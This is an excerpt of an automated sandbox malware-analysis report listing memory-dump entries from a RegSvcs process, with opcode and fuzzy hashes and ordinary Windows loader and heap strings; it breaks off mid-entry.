                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-161242083
                                                                        • Opcode ID: 841fa3181a5ba299d0b92ae0f9d50689c5fb98836449af741000edc9da2d3108
                                                                        • Instruction ID: 83da8792776efe1c925eb5b1965e8f2cc3c8985d4836d9baf4b141f92f2257ca
                                                                        • Opcode Fuzzy Hash: 841fa3181a5ba299d0b92ae0f9d50689c5fb98836449af741000edc9da2d3108
                                                                        • Instruction Fuzzy Hash: A971F470A00206DFEB2AEF69C940AAEB7F4FB44204F15406FE912DB361E774AD46CB54
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-1334570610
                                                                        • Opcode ID: 2d88917e3a9a8c8d7119832097d0f3d3564507e82084bd958a30244965148a74
                                                                        • Instruction ID: 215d56a562535dd520c5edeb353788fae167fab18412e172ea8655580b6fac98
                                                                        • Opcode Fuzzy Hash: 2d88917e3a9a8c8d7119832097d0f3d3564507e82084bd958a30244965148a74
                                                                        • Instruction Fuzzy Hash: BD61AE706003019FDB29DF68C444B6ABBE1FF99704F14866EE4598F3A6D770E882CB91
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 014982E8
                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 014982DE
                                                                        • Failed to reallocate the system dirs string !, xrefs: 014982D7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-1783798831
                                                                        • Opcode ID: 2c409027f632e110af7373f902042e51ba3108300c9d932b0e8c62b850e47234
                                                                        • Instruction ID: e2414476666acf8eba3cdc686a81c4ca7cab6b858aa70604752a76d349402746
                                                                        • Opcode Fuzzy Hash: 2c409027f632e110af7373f902042e51ba3108300c9d932b0e8c62b850e47234
                                                                        • Instruction Fuzzy Hash: 84412471544302ABD722EB69D880F5B7BE8EF68A10F01082FF954DB2B5E7B0D804CB91
                                                                        Strings
                                                                        • PreferredUILanguages, xrefs: 014DC212
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 014DC1C5
                                                                        • @, xrefs: 014DC1F1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                        • API String ID: 0-2968386058
                                                                        • Opcode ID: 37cf488b0386f693164da7cd486324d7504e6f310cc14a1a58fdf4da5fc52233
                                                                        • Instruction ID: 7bf4b64b17a4b38dfdd72259fb9dd25f4cfceb212da748b2ca446f55899dbf9e
                                                                        • Opcode Fuzzy Hash: 37cf488b0386f693164da7cd486324d7504e6f310cc14a1a58fdf4da5fc52233
                                                                        • Instruction Fuzzy Hash: 85418072E0020AEBDF11DBD9C891FEEBBB9AB24704F10416FE609A7260D7749A44CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                        • API String ID: 0-1373925480
                                                                        • Opcode ID: fa787307a947492878c4e297a7164d2bda4f9115b76d7ad90c063db851118342
                                                                        • Instruction ID: 7c05f3b7102692789d84a45464fe6fbbd8b5eeeb0796308b6a83eb927c38dee9
                                                                        • Opcode Fuzzy Hash: fa787307a947492878c4e297a7164d2bda4f9115b76d7ad90c063db851118342
                                                                        • Instruction Fuzzy Hash: 2541F931A006588BEB25DBD9D884BEDBBB4FF65340F18045BD902EB7B2D7349902CB61
                                                                        Strings
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 014A4899
                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 014A4888
                                                                        • LdrpCheckRedirection, xrefs: 014A488F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-3154609507
                                                                        • Opcode ID: a7094dec4d98975524d71a6c165c1653479d466da9e698befb04c18cce26f012
                                                                        • Instruction ID: f120406db55e6ca886c8d15857a20b0a4d378e30ceeefd5c44c1cede3d9e48ff
                                                                        • Opcode Fuzzy Hash: a7094dec4d98975524d71a6c165c1653479d466da9e698befb04c18cce26f012
                                                                        • Instruction Fuzzy Hash: 7541D63A6002919FCB22CF19E840A2B7BE4EF69650B8F055FED559B371D3B0D800CB81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                        • API String ID: 0-2558761708
                                                                        • Opcode ID: 8135ac81683937a3632ade11cb2b659c19ad4bab9e9fe67605dce5fd958a843f
                                                                        • Instruction ID: c576c6480feb8d89354541fa3267691ee24bbeae8c260eef80fafbc3d3813d4f
                                                                        • Opcode Fuzzy Hash: 8135ac81683937a3632ade11cb2b659c19ad4bab9e9fe67605dce5fd958a843f
                                                                        • Instruction Fuzzy Hash: B111CD313151029FDB29EA19C441B7AB3A5EF94A1AF18822FF4068F375DB30D842CB50
                                                                        Strings
                                                                        • Process initialization failed with status 0x%08lx, xrefs: 014A20F3
                                                                        • LdrpInitializationFailure, xrefs: 014A20FA
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 014A2104
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2986994758
                                                                        • Opcode ID: 7b2171b51a1a2d030876a5e3cf1521eca9850acef6457e6186ec7363432471d5
                                                                        • Instruction ID: 05ca540ed4ca2e8adfc72378ada3f49d650b5900c1c3f64f03689c3b0f51f127
                                                                        • Opcode Fuzzy Hash: 7b2171b51a1a2d030876a5e3cf1521eca9850acef6457e6186ec7363432471d5
                                                                        • Instruction Fuzzy Hash: 32F02835640309ABE721E70EDC46F9A3768EB51B58F51002EF7007B2E1D2F0A600D641
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: #%u
                                                                        • API String ID: 48624451-232158463
                                                                        • Opcode ID: 3fe2e305de9013dcc89e9ee1b2bd8bbec9cb9410153043054f3f8f5157f3513f
                                                                        • Instruction ID: 4b6c60fdb8e75e91e0c8458f42cc2290c93584073598ebd3cd7430b82eafccd6
                                                                        • Opcode Fuzzy Hash: 3fe2e305de9013dcc89e9ee1b2bd8bbec9cb9410153043054f3f8f5157f3513f
                                                                        • Instruction Fuzzy Hash: 3C715D71A0014A9FDB01DFA9D984FAEB7F8BF68304F15406AE905E7261E634EE01CB61
                                                                        Strings
                                                                        • LdrResSearchResource Exit, xrefs: 0142AA25
                                                                        • LdrResSearchResource Enter, xrefs: 0142AA13
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                        • API String ID: 0-4066393604
                                                                        • Opcode ID: 8b606ebdf7109172e299fc24f6cd3d31430e5e5bef0779268c98f813edbd9153
                                                                        • Instruction ID: 1358b60279c4f83713d98dcefb614c42d9581a7f9bd91e2b5f3cc66f6fca98a2
                                                                        • Opcode Fuzzy Hash: 8b606ebdf7109172e299fc24f6cd3d31430e5e5bef0779268c98f813edbd9153
                                                                        • Instruction Fuzzy Hash: B4E17171E002299FEF21DE99C984BAEBBB9BF14710F64042BEE01E7661D774D981CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction ID: cb1a066bc26226a4c3ef6c74aa06d1d655beae4ca5449369c74f2d7ce116cabe
                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                        • Instruction Fuzzy Hash: 56C1D4312043429BEB24CF29C849B6BBBE5BFD4319F284A2EF695C72A0D774D505CB41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 2994545307-634100481
                                                                        • Opcode ID: b39bc9f85a1a4b70f8933ea0e287b526f7cdf709516e74570f30f1cc191b1e3c
                                                                        • Instruction ID: d7fe28a52b6b5c631a6bc60d6ab0d6dd86dae9cebae2cad21540dfdfba2655dd
                                                                        • Opcode Fuzzy Hash: b39bc9f85a1a4b70f8933ea0e287b526f7cdf709516e74570f30f1cc191b1e3c
                                                                        • Instruction Fuzzy Hash: 47617B71E002199FDF24DFA9C840BAEBBB9FB58704F14406EE649EB2A1D731E941CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$MUI
                                                                        • API String ID: 0-17815947
                                                                        • Opcode ID: 7ac3e111d47ed178708d5fa3fa80db8d7ad1aa49c19e47fa0c596114a3d789b8
                                                                        • Instruction ID: 82860796b2f95f08e589d2cdf99408319a84ae45d11dd3156d6a94b8fb02b69a
                                                                        • Opcode Fuzzy Hash: 7ac3e111d47ed178708d5fa3fa80db8d7ad1aa49c19e47fa0c596114a3d789b8
                                                                        • Instruction Fuzzy Hash: 26516B71E0021DAFDB11DFA9CD90EEFBBBCEB54B54F14052AE601B72A0D6309A05CB60
                                                                        Strings
                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0142063D
                                                                        • kLsE, xrefs: 01420540
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                        • API String ID: 0-2547482624
                                                                        • Opcode ID: 72fa7abc147dc3df11efd4359ca0b7472af401b5675ba717e3f76bc2fda08e81
                                                                        • Instruction ID: 0eeb18fb6b2bad7310ca3bfe2371553854e2bc43352abd17886450c000d7311a
                                                                        • Opcode Fuzzy Hash: 72fa7abc147dc3df11efd4359ca0b7472af401b5675ba717e3f76bc2fda08e81
                                                                        • Instruction Fuzzy Hash: E051AB716047528BD735EF29C4446A7BBE4AF84304F50883FFAAA87361E770E585CB92
                                                                        Strings
                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0142A309
                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0142A2FB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                        • API String ID: 0-2876891731
                                                                        • Opcode ID: 1485ee92002bd4203a6bb7d313c12182f22d27e1415c05706da42885105d2854
                                                                        • Instruction ID: 677314143fa23870b3c0fc1da75bcd396afa4ed0e1286af682a3c70682b8184c
                                                                        • Opcode Fuzzy Hash: 1485ee92002bd4203a6bb7d313c12182f22d27e1415c05706da42885105d2854
                                                                        • Instruction Fuzzy Hash: DE419A30A01665DBEB22DF59C844B6E7BB4EF94700F2440AAED00DB7B2E2B5D981CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: Cleanup Group$Threadpool!
                                                                        • API String ID: 2994545307-4008356553
                                                                        • Opcode ID: 4e20f59309abb7a156f13051ff64c86d686eebe329960cb811de16ee4811f54c
                                                                        • Instruction ID: 9539bb24e1101e5f10b9ebccd43023d7568aa66650b4f004f1fa44d7c0b069e6
                                                                        • Opcode Fuzzy Hash: 4e20f59309abb7a156f13051ff64c86d686eebe329960cb811de16ee4811f54c
                                                                        • Instruction Fuzzy Hash: 3E01ADB2240700AFD351DF24CD45B2677E8E794719F058A3EAA9CCB1A1E374D804CB56
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MUI
                                                                        • API String ID: 0-1339004836
                                                                        • Opcode ID: 75ef14fd7f42459976b730f2ac29f12d76ba0847a1b9b53ec736dcafbbbc5d6d
                                                                        • Instruction ID: 1b2ee79bac08d5f8a8eeda43a15cac01345d83e7c360b49e1f5d72e6bf3024c2
                                                                        • Opcode Fuzzy Hash: 75ef14fd7f42459976b730f2ac29f12d76ba0847a1b9b53ec736dcafbbbc5d6d
                                                                        • Instruction Fuzzy Hash: 7A825075E002299FDB25CFA9C880BEEBBB1BF48310F54816AD919AB361D7709D81CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: c3b3f0b59409fc6cefcbc39eb8c81ad78dcf15ccc2cac7af16b155c351ebb1df
                                                                        • Instruction ID: 1a070f95e4c142b3d32873ee567e2059ec621fc3888f9aafccd2e90ae939cd77
                                                                        • Opcode Fuzzy Hash: c3b3f0b59409fc6cefcbc39eb8c81ad78dcf15ccc2cac7af16b155c351ebb1df
                                                                        • Instruction Fuzzy Hash: 5E918771900219AFEB21DF95DD85FAF7BB8EF68B50F55401AF600AB1A0D774AD00CB60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 3754c7dc9c9f6b34e2dab115dcf106deedd32f8a5746c61d92c48ab513f16948
                                                                        • Instruction ID: 733ebc06afdbd0811367ef3954c19660d4c5669c87117b91bc58ca3eb409f1c5
                                                                        • Opcode Fuzzy Hash: 3754c7dc9c9f6b34e2dab115dcf106deedd32f8a5746c61d92c48ab513f16948
                                                                        • Instruction Fuzzy Hash: 9E918076900605ABDB62AFA6DC44FAFBF7AEF95B50F10001EF501A7271DB74A902CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: GlobalTags
                                                                        • API String ID: 0-1106856819
                                                                        • Opcode ID: 152b1da8774bd2f34773fa8ba6696e33629551170a1d3e542e3db4615507ddf9
                                                                        • Instruction ID: e3e4775dc36cdb48fa8d9b01747aab1acaa92dd3fac50fced3d3a42e8bb8a0a2
                                                                        • Opcode Fuzzy Hash: 152b1da8774bd2f34773fa8ba6696e33629551170a1d3e542e3db4615507ddf9
                                                                        • Instruction Fuzzy Hash: CE716DB5E0120A9FDF28CF9DD590AAEBBB1BF58710F15816FE905AB361E7308841CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .mui
                                                                        • API String ID: 0-1199573805
                                                                        • Opcode ID: 7860167e2f1fe3d14304b3c94a20a7ba7689c1241fa87f5b0e6176fd07c6b825
                                                                        • Instruction ID: 4d34663643234b8ef876a5992279c2b2249ad1403553a448b5e8150f69a7c169
                                                                        • Opcode Fuzzy Hash: 7860167e2f1fe3d14304b3c94a20a7ba7689c1241fa87f5b0e6176fd07c6b825
                                                                        • Instruction Fuzzy Hash: 1551A476D00226DBDF50DF99D950AAEBBB4AF14E10F09412FEA11B7360D7359901CBA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: EXT-
                                                                        • API String ID: 0-1948896318
                                                                        • Opcode ID: df41af4d690b5c09fa92b3bbaa12551546e3ed33c731aa1fd481cffc3c33d1bb
                                                                        • Instruction ID: d39fc7003f6a1714b74bd27d18b06b1aab20f0c96fb1fc64de9c7a1b11eac6c2
                                                                        • Opcode Fuzzy Hash: df41af4d690b5c09fa92b3bbaa12551546e3ed33c731aa1fd481cffc3c33d1bb
                                                                        • Instruction Fuzzy Hash: B741A07250A3429BD721DA76C840B6BB7E8AFDC718F44092FF684E72A0E774D9058793
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        • Opcode ID: b3a283750c384760051c8a2dce2124237a784d9ad66d8c2265933693062ee26c
                                                                        • Instruction ID: 5543ad128b549ebb945f9afb5001e2deb2afa026e19a91cf067836b07004c3d0
                                                                        • Opcode Fuzzy Hash: b3a283750c384760051c8a2dce2124237a784d9ad66d8c2265933693062ee26c
                                                                        • Instruction Fuzzy Hash: 7D4146B1D0012DAADF21DB51CC84FDEBB7CAB54718F0045EAE608AB150DB709E498FA5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #
                                                                        • API String ID: 0-1885708031
                                                                        • Opcode ID: fc7bab727f906a80a69c6feceb861c7e9065585ee38e9c647cd54f31d9add0c8
                                                                        • Instruction ID: 60c9bda3f12b89c6b645fe7d47cd88f3864c109f97f9871da51bd0d0e93cfcc7
                                                                        • Opcode Fuzzy Hash: fc7bab727f906a80a69c6feceb861c7e9065585ee38e9c647cd54f31d9add0c8
                                                                        • Instruction Fuzzy Hash: F0311631A007199BEB32DB69C890BEE7BB8DF55704F16402EE950AB2A2D775DC05CB60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryName
                                                                        • API String ID: 0-215506332
                                                                        • Opcode ID: fa631a78cd87b0022ded1c2997b553975ce4c17bd20c90e089c235ea71b06249
                                                                        • Instruction ID: 1aeff1b6e65b8094cfcafde2a0e8cb97130429af7ac336e100929ed7fcc0b6dd
                                                                        • Opcode Fuzzy Hash: fa631a78cd87b0022ded1c2997b553975ce4c17bd20c90e089c235ea71b06249
                                                                        • Instruction Fuzzy Hash: F631E13690051AAFEF16DB59D895E7FBF74EB90760F01412AE905AB2A0D7309E04DBE0
                                                                        Strings
                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 014A895E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                        • API String ID: 0-702105204
                                                                        • Opcode ID: 5f7c4cf10e7be55064e67f9979ef97c891c532aba09718184a0afd24827bcd7d
                                                                        • Instruction ID: 70d13e965de468c60fcb8482ab2a9fc4188d1edc9d178b1d6f61f4f738f9edb2
                                                                        • Opcode Fuzzy Hash: 5f7c4cf10e7be55064e67f9979ef97c891c532aba09718184a0afd24827bcd7d
                                                                        • Instruction Fuzzy Hash: 3E0147322102029BF6226B1AC884A977F69FFF6655BC6002FF6410A275CB306C86C792
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0ad9e1e79cb0a46e979e0daa5b87e6998128cd73893628d562cc10d62fa88dae
                                                                        • Instruction ID: 9ee7d3b654e2787c709558536d6a0f7dc1b604b5c4f2e68f0d085e464aa861e5
                                                                        • Opcode Fuzzy Hash: 0ad9e1e79cb0a46e979e0daa5b87e6998128cd73893628d562cc10d62fa88dae
                                                                        • Instruction Fuzzy Hash: 8E42A3796043419BD765CF69C890E6BBBE5AB98B00F08092FFA8697370D6F0D845CB52
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1fdefaa12979b1d3a148834dceacf98af05b1a0bc5a84ac9c368bed0fbae2608
                                                                        • Instruction ID: f43157d889328e832e83fd7570640688f42a4e8f31c98ad93b60bccc59b4a8d3
                                                                        • Opcode Fuzzy Hash: 1fdefaa12979b1d3a148834dceacf98af05b1a0bc5a84ac9c368bed0fbae2608
                                                                        • Instruction Fuzzy Hash: 07425275A0021A8FEB25CF69C881BEEBBF9BF54300F14819AE549EB351D7349985CF60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f449394c1f34c1ff5781971955570e41a396a38a2eab5df75967c2e3ac059ad8
                                                                        • Instruction ID: adc37ff4065a90e4692e88a24add3b77eaa4d5e1d1a1f00b3abd3bf7a3e91ac3
                                                                        • Opcode Fuzzy Hash: f449394c1f34c1ff5781971955570e41a396a38a2eab5df75967c2e3ac059ad8
                                                                        • Instruction Fuzzy Hash: 91320E70A007558FEB65EF69C844BBEBBF2BF84704F25412ED44A9B3A4D774A802CB50
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 85105b51c0591b042adff3455619da1ea6c849b749e42297dc36ffafa3dc0d6e
                                                                        • Instruction ID: a243472c79593cfba11edd7343f1792c74017f7ba5afa4c7b593ac52ad4550a3
                                                                        • Opcode Fuzzy Hash: 85105b51c0591b042adff3455619da1ea6c849b749e42297dc36ffafa3dc0d6e
                                                                        • Instruction Fuzzy Hash: 3C22BD782046698AEBA5CF29C054372BBF1AF44B04F28845FD9868F3A6F735D452DB60
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1653532342.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_13f0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8c87376cf0161bf9b5c772e9b459884438eb538a8bbf56c8ed5887d1c7f06de3
